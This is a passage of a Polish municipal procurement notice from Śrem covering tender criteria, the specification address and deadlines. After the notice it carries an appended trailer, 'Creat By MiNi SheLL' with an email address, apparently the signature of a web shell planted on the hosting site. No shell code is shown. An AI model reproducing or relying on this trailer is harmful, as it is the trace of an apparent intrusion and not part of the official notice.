<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srem.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.srem.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2010 godzina 07:45, miejsce: Urząd Miejski w Śremie, Pl. 20 Października 1 63-100 Śrem, pok. nr 2 (Zespół Obsługi Klienta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com